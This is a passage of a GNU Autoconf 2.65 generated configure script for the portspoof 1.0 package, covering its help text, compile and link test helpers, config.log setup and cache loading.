ac_cv_env_${ac_var}_value=\$${ac_var} +done + +# +# Report the --help message. +# +if test "$ac_init_help" = "long"; then + # Omit some internal or obsolete options to make the list less imposing. + # This message is too long to be a string in the A/UX 3.1 sh. + cat <<_ACEOF +\`configure' configures portspoof 1.0 to adapt to many kinds of systems. + +Usage: $0 [OPTION]... [VAR=VALUE]... + +To assign environment variables (e.g., CC, CFLAGS...), specify them as +VAR=VALUE. See below for descriptions of some of the useful variables. + +Defaults for the options are specified in brackets. + +Configuration: + -h, --help display this help and exit + --help=short display options specific to this package + --help=recursive display the short help of all the included packages + -V, --version display version information and exit + -q, --quiet, --silent do not print \`checking...' messages + --cache-file=FILE cache test results in FILE [disabled] + -C, --config-cache alias for \`--cache-file=config.cache' + -n, --no-create do not create output files + --srcdir=DIR find the sources in DIR [configure dir or \`..'] + +Installation directories: + --prefix=PREFIX install architecture-independent files in PREFIX + @<:@@S|@ac_default_prefix@:>@ + --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX + @<:@PREFIX@:>@ + +By default, \`make install' will install all the files in +\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc. You can specify +an installation prefix other than \`$ac_default_prefix' using \`--prefix', +for instance \`--prefix=\$HOME'. + +For better control, use the options below. + +Fine tuning of the installation directories: + --bindir=DIR user executables [EPREFIX/bin] + --sbindir=DIR system admin executables [EPREFIX/sbin] + --libexecdir=DIR program executables [EPREFIX/libexec] + --sysconfdir=DIR read-only single-machine data [PREFIX/etc] + --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] + --localstatedir=DIR modifiable single-machine data [PREFIX/var] + --libdir=DIR object code libraries [EPREFIX/lib] + --includedir=DIR C header files [PREFIX/include] + --oldincludedir=DIR C header files for non-gcc [/usr/include] + --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] + --datadir=DIR read-only architecture-independent data [DATAROOTDIR] + --infodir=DIR info documentation [DATAROOTDIR/info] + --localedir=DIR locale-dependent data [DATAROOTDIR/locale] + --mandir=DIR man documentation [DATAROOTDIR/man] + --docdir=DIR documentation root @<:@DATAROOTDIR/doc/portspoof@:>@ + --htmldir=DIR html documentation [DOCDIR] + --dvidir=DIR dvi documentation [DOCDIR] + --pdfdir=DIR pdf documentation [DOCDIR] + --psdir=DIR ps documentation [DOCDIR] +_ACEOF + + cat <<\_ACEOF + +Program names: + --program-prefix=PREFIX prepend PREFIX to installed program names + --program-suffix=SUFFIX append SUFFIX to installed program names + --program-transform-name=PROGRAM run sed PROGRAM on installed program names + +System types: + --build=BUILD configure for building on BUILD [guessed] + --host=HOST cross-compile to build programs to run on HOST [BUILD] +_ACEOF +fi + +if test -n "$ac_init_help"; then + case $ac_init_help in + short | recursive ) echo "Configuration of portspoof 1.0:";; + esac + cat <<\_ACEOF + +Optional Features: + --disable-option-checking ignore unrecognized --enable/--with options + --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) + --enable-FEATURE[=ARG] include FEATURE [ARG=yes] + --disable-dependency-tracking speeds up one-time build + --enable-dependency-tracking do not reject slow dependency extractors + +Some influential environment variables: + CXX C++ compiler command + CXXFLAGS C++ compiler flags + LDFLAGS linker flags, e.g. -L if you have libraries in a + nonstandard directory + LIBS libraries to pass to the linker, e.g. -l + CPPFLAGS (Objective) C/C++ preprocessor flags, e.g. -I if + you have headers in a nonstandard directory + CC C compiler command + CFLAGS C compiler flags + CPP C preprocessor + +Use these variables to override the choices made by `configure' or to help +it to find libraries and programs with nonstandard names/locations. + +Report bugs to . +_ACEOF +ac_status=$? +fi + +if test "$ac_init_help" = "recursive"; then + # If there are subdirs, report their specific --help. + for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue + test -d "$ac_dir" || + { cd "$srcdir" && ac_pwd=`pwd` && srcdir=. && test -d "$ac_dir"; } || + continue + ac_builddir=. + +case "$ac_dir" in +.) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; +*) + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` + # A ".." for each directory in $ac_dir_suffix. + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` + case $ac_top_builddir_sub in + "") ac_top_builddir_sub=. ac_top_build_prefix= ;; + *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; + esac ;; +esac +ac_abs_top_builddir=$ac_pwd +ac_abs_builddir=$ac_pwd$ac_dir_suffix +# for backward compatibility: +ac_top_builddir=$ac_top_build_prefix + +case $srcdir in + .) # We are building in place. + ac_srcdir=. + ac_top_srcdir=$ac_top_builddir_sub + ac_abs_top_srcdir=$ac_pwd ;; + [\\/]* | ?:[\\/]* ) # Absolute name. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir + ac_abs_top_srcdir=$srcdir ;; + *) # Relative name. + ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_build_prefix$srcdir + ac_abs_top_srcdir=$ac_pwd/$srcdir ;; +esac +ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix + + cd "$ac_dir" || { ac_status=$?; continue; } + # Check for guested configure. + if test -f "$ac_srcdir/configure.gnu"; then + echo && + $SHELL "$ac_srcdir/configure.gnu" --help=recursive + elif test -f "$ac_srcdir/configure"; then + echo && + $SHELL "$ac_srcdir/configure" --help=recursive + else + $as_echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 + fi || ac_status=$? + cd "$ac_pwd" || { ac_status=$?; break; } + done +fi + +test -n "$ac_init_help" && exit $ac_status +if $ac_init_version; then + cat <<\_ACEOF +portspoof configure 1.0 +generated by GNU Autoconf 2.65 + +Copyright (C) 2009 Free Software Foundation, Inc. +This configure script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it. +_ACEOF + exit +fi + +## ------------------------ ## +## Autoconf initialization. ## +## ------------------------ ## + +@%:@ ac_fn_cxx_try_compile LINENO +@%:@ ---------------------------- +@%:@ Try to compile conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_cxx_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_cxx_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_cxx_try_compile + +@%:@ ac_fn_c_try_compile LINENO +@%:@ -------------------------- +@%:@ Try to compile conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_compile + +@%:@ ac_fn_c_try_cpp LINENO +@%:@ ---------------------- +@%:@ Try to preprocess conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_cpp () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_cpp conftest.$ac_ext" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } >/dev/null && { + test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || + test ! -s conftest.err + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_cpp + +@%:@ ac_fn_c_try_run LINENO +@%:@ ---------------------- +@%:@ Try to link conftest.@S|@ac_ext, and return whether this succeeded. Assumes +@%:@ that executables *can* be run. +ac_fn_c_try_run () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { ac_try='./conftest$ac_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then : + ac_retval=0 +else + $as_echo "$as_me: program exited with status $ac_status" >&5 + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=$ac_status +fi + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_run + +@%:@ ac_fn_c_check_header_mongrel LINENO HEADER VAR INCLUDES +@%:@ ------------------------------------------------------- +@%:@ Tests whether HEADER exists, giving a warning if it cannot be compiled using +@%:@ the include files in INCLUDES and setting the cache variable VAR +@%:@ accordingly. +ac_fn_c_check_header_mongrel () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +else + # Is the header compilable? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 usability" >&5 +$as_echo_n "checking $2 usability... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +@%:@include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_header_compiler=yes +else + ac_header_compiler=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_compiler" >&5 +$as_echo "$ac_header_compiler" >&6; } + +# Is the header present? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 presence" >&5 +$as_echo_n "checking $2 presence... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include <$2> +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + ac_header_preproc=yes +else + ac_header_preproc=no +fi +rm -f conftest.err conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_preproc" >&5 +$as_echo "$ac_header_preproc" >&6; } + +# So? What about this header? +case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in #(( + yes:no: ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&5 +$as_echo "$as_me: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} + ;; + no:yes:* ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: present but cannot be compiled" >&5 +$as_echo "$as_me: WARNING: $2: present but cannot be compiled" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: check for missing prerequisite headers?" >&5 +$as_echo "$as_me: WARNING: $2: check for missing prerequisite headers?" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: see the Autoconf documentation" >&5 +$as_echo "$as_me: WARNING: $2: see the Autoconf documentation" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&5 +$as_echo "$as_me: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} +( cat <<\_ASBOX +## ---------------------------------- ## +## Report this to piotratduszynski.eu ## +## ---------------------------------- ## +_ASBOX + ) | sed "s/^/$as_me: WARNING: /" >&2 + ;; +esac + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=\$ac_header_compiler" +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_header_mongrel + +@%:@ ac_fn_c_check_header_compile LINENO HEADER VAR INCLUDES +@%:@ ------------------------------------------------------- +@%:@ Tests whether HEADER exists and can be compiled using the include files in +@%:@ INCLUDES, setting the cache variable VAR accordingly. +ac_fn_c_check_header_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +@%:@include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_header_compile + +@%:@ ac_fn_c_check_type LINENO TYPE VAR INCLUDES +@%:@ ------------------------------------------- +@%:@ Tests whether TYPE exists after having included INCLUDES, setting cache +@%:@ variable VAR accordingly. +ac_fn_c_check_type () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=no" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof ($2)) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof (($2))) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + +else + eval "$3=yes" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_type + +@%:@ ac_fn_c_try_link LINENO +@%:@ ----------------------- +@%:@ Try to link conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_link () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext conftest$ac_exeext + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest$ac_exeext && { + test "$cross_compiling" = yes || + $as_test_x conftest$ac_exeext + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information + # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would + # interfere with the next link command; also delete a directory that is + # left behind by Apple's compiler. We do this before executing the actions. + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_link + +@%:@ ac_fn_c_check_func LINENO FUNC VAR +@%:@ ---------------------------------- +@%:@ Tests whether FUNC exists, setting the cache variable VAR accordingly +ac_fn_c_check_func () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +/* Define $2 to an innocuous variant, in case declares $2. + For example, HP-UX 11i declares gettimeofday. */ +#define $2 innocuous_$2 + +/* System header to define __stub macros and hopefully few prototypes, + which can conflict with char $2 (); below. + Prefer to if __STDC__ is defined, since + exists even on freestanding compilers. */ + +#ifdef __STDC__ +# include +#else +# include +#endif + +#undef $2 + +/* Override any GCC internal prototype to avoid an error. + Use char because int might match the return type of a GCC + builtin and then its argument prototype would still apply. */ +#ifdef __cplusplus +extern "C" +#endif +char $2 (); +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ +#if defined __stub_$2 || defined __stub___$2 +choke me +#endif + +int +main () +{ +return $2 (); + ; + return 0; +} +_ACEOF +if ac_fn_c_try_link "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext \ + conftest$ac_exeext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} @%:@ ac_fn_c_check_func +cat >config.log <<_ACEOF +This file contains any messages produced by compilers while +running configure, to aid debugging if configure makes a mistake. + +It was created by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was + + $ $0 $@ + +_ACEOF +exec 5>>config.log +{ +cat <<_ASUNAME +## --------- ## +## Platform. ## +## --------- ## + +hostname = `(hostname || uname -n) 2>/dev/null | sed 1q` +uname -m = `(uname -m) 2>/dev/null || echo unknown` +uname -r = `(uname -r) 2>/dev/null || echo unknown` +uname -s = `(uname -s) 2>/dev/null || echo unknown` +uname -v = `(uname -v) 2>/dev/null || echo unknown` + +/usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null || echo unknown` +/bin/uname -X = `(/bin/uname -X) 2>/dev/null || echo unknown` + +/bin/arch = `(/bin/arch) 2>/dev/null || echo unknown` +/usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null || echo unknown` +/usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null || echo unknown` +/usr/bin/hostinfo = `(/usr/bin/hostinfo) 2>/dev/null || echo unknown` +/bin/machine = `(/bin/machine) 2>/dev/null || echo unknown` +/usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null || echo unknown` +/bin/universe = `(/bin/universe) 2>/dev/null || echo unknown` + +_ASUNAME + +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + $as_echo "PATH: $as_dir" + done +IFS=$as_save_IFS + +} >&5 + +cat >&5 <<_ACEOF + + +## ----------- ## +## Core tests. ## +## ----------- ## + +_ACEOF + + +# Keep a trace of the command line. +# Strip out --no-create and --no-recursion so they do not pile up. +# Strip out --silent because we don't want to record it for future runs. +# Also quote any args containing shell meta-characters. +# Make two passes to allow for proper duplicate-argument suppression. +ac_configure_args= +ac_configure_args0= +ac_configure_args1= +ac_must_keep_next=false +for ac_pass in 1 2 +do + for ac_arg + do + case $ac_arg in + -no-create | --no-c* | -n | -no-recursion | --no-r*) continue ;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil) + continue ;; + *\'*) + ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + case $ac_pass in + 1) as_fn_append ac_configure_args0 " '$ac_arg'" ;; + 2) + as_fn_append ac_configure_args1 " '$ac_arg'" + if test $ac_must_keep_next = true; then + ac_must_keep_next=false # Got value, back to normal. + else + case $ac_arg in + *=* | --config-cache | -C | -disable-* | --disable-* \ + | -enable-* | --enable-* | -gas | --g* | -nfp | --nf* \ + | -q | -quiet | --q* | -silent | --sil* | -v | -verb* \ + | -with-* | --with-* | -without-* | --without-* | --x) + case "$ac_configure_args0 " in + "$ac_configure_args1"*" '$ac_arg' "* ) continue ;; + esac + ;; + -* ) ac_must_keep_next=true ;; + esac + fi + as_fn_append ac_configure_args " '$ac_arg'" + ;; + esac + done +done +{ ac_configure_args0=; unset ac_configure_args0;} +{ ac_configure_args1=; unset ac_configure_args1;} + +# When interrupted or exit'd, cleanup temporary files, and complete +# config.log. We remove comments because anyway the quotes in there +# would cause problems or look ugly. +# WARNING: Use '\'' to represent an apostrophe within the trap. +# WARNING: Do not start the trap code with a newline, due to a FreeBSD 4.0 bug. +trap 'exit_status=$? + # Save into config.log some information that might help in debugging. + { + echo + + cat <<\_ASBOX +## ---------------- ## +## Cache variables. ## +## ---------------- ## +_ASBOX + echo + # The following way of writing the cache mishandles newlines in values, +( + for ac_var in `(set) 2>&1 | sed -n '\''s/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'\''`; do + eval ac_val=\$$ac_var + case $ac_val in #( + *${as_nl}*) + case $ac_var in #( + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; + esac + case $ac_var in #( + _ | IFS | as_nl) ;; #( + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; + esac ;; + esac + done + (set) 2>&1 | + case $as_nl`(ac_space='\'' '\''; set) 2>&1` in #( + *${as_nl}ac_space=\ *) + sed -n \ + "s/'\''/'\''\\\\'\'''\''/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\''\\2'\''/p" + ;; #( + *) + sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" + ;; + esac | + sort +) + echo + + cat <<\_ASBOX +## ----------------- ## +## Output variables. ## +## ----------------- ## +_ASBOX + echo + for ac_var in $ac_subst_vars + do + eval ac_val=\$$ac_var + case $ac_val in + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + esac + $as_echo "$ac_var='\''$ac_val'\''" + done | sort + echo + + if test -n "$ac_subst_files"; then + cat <<\_ASBOX +## ------------------- ## +## File substitutions. ## +## ------------------- ## +_ASBOX + echo + for ac_var in $ac_subst_files + do + eval ac_val=\$$ac_var + case $ac_val in + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + esac + $as_echo "$ac_var='\''$ac_val'\''" + done | sort + echo + fi + + if test -s confdefs.h; then + cat <<\_ASBOX +## ----------- ## +## confdefs.h. ## +## ----------- ## +_ASBOX + echo + cat confdefs.h + echo + fi + test "$ac_signal" != 0 && + $as_echo "$as_me: caught signal $ac_signal" + $as_echo "$as_me: exit $exit_status" + } >&5 + rm -f core *.core core.conftest.* && + rm -f -r conftest* confdefs* conf$$* $ac_clean_files && + exit $exit_status +' 0 +for ac_signal in 1 2 13 15; do + trap 'ac_signal='$ac_signal'; as_fn_exit 1' $ac_signal +done +ac_signal=0 + +# confdefs.h avoids OS command line length limits that DEFS can exceed. +rm -f -r conftest* confdefs.h + +$as_echo "/* confdefs.h */" > confdefs.h + +# Predefined preprocessor variables. + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_NAME "$PACKAGE_NAME" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_TARNAME "$PACKAGE_TARNAME" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_VERSION "$PACKAGE_VERSION" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_STRING "$PACKAGE_STRING" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_BUGREPORT "$PACKAGE_BUGREPORT" +_ACEOF + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE_URL "$PACKAGE_URL" +_ACEOF + + +# Let the site file select an alternate cache file if it wants to. +# Prefer an explicitly selected file to automatically selected ones. +ac_site_file1=NONE +ac_site_file2=NONE +if test -n "$CONFIG_SITE"; then + ac_site_file1=$CONFIG_SITE +elif test "x$prefix" != xNONE; then + ac_site_file1=$prefix/share/config.site + ac_site_file2=$prefix/etc/config.site +else + ac_site_file1=$ac_default_prefix/share/config.site + ac_site_file2=$ac_default_prefix/etc/config.site +fi +for ac_site_file in "$ac_site_file1" "$ac_site_file2" +do + test "x$ac_site_file" = xNONE && continue + if test /dev/null != "$ac_site_file" && test -r "$ac_site_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading site script $ac_site_file" >&5 +$as_echo "$as_me: loading site script $ac_site_file" >&6;} + sed 's/^/| /' "$ac_site_file" >&5 + . "$ac_site_file" + fi +done + +if test -r "$cache_file"; then + # Some versions of bash will fail to source /dev/null (special files + # actually), so we avoid doing that. DJGPP emulates it as a regular file. + if test /dev/null != "$cache_file" && test -f "$cache_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading cache $cache_file" >&5 +$as_echo "$as_me: loading cache $cache_file" >&6;} + case $cache_file in + [\\/]* | ?:[\\/]* ) . "$cache_file";; + *) . "./$cache_file";; + esac + fi +else + { $as_echo "$as_me:${as_lineno-$LINENO}: creating cache $cache_file" >&5 +$as_echo "$as_me: creating cache $cache_file" >&6;} + >$cache_file +fi + +# Check that the precious variables saved in the cache have kept the same +# value. 